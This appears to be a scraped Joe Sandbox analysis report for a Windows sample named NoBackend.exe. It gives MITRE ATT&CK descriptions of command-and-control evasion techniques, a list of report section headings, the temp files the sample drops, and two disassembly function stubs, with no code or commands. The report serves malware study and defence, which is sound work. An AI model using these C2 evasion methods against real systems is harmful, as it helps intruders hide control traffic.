Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NoBackend.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\LGPKVAOAL.zip

C:\Users\user\AppData\Local\Temp\Laze1

C:\Users\user\AppData\Local\Temp\Laze2

C:\Users\user\AppData\Local\Temp\Laze3

C:\Users\user\AppData\Local\Temp\Laze5

C:\Users\user\AppData\Local\Temp\Laze6

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
NoBackend.exe

Function 00B82080 Relevance: 45.3, Strings: 36, Instructions: 274
COMMON

Function 00B5C1E0 Relevance: 12.9, Strings: 10, Instructions: 386
COMMON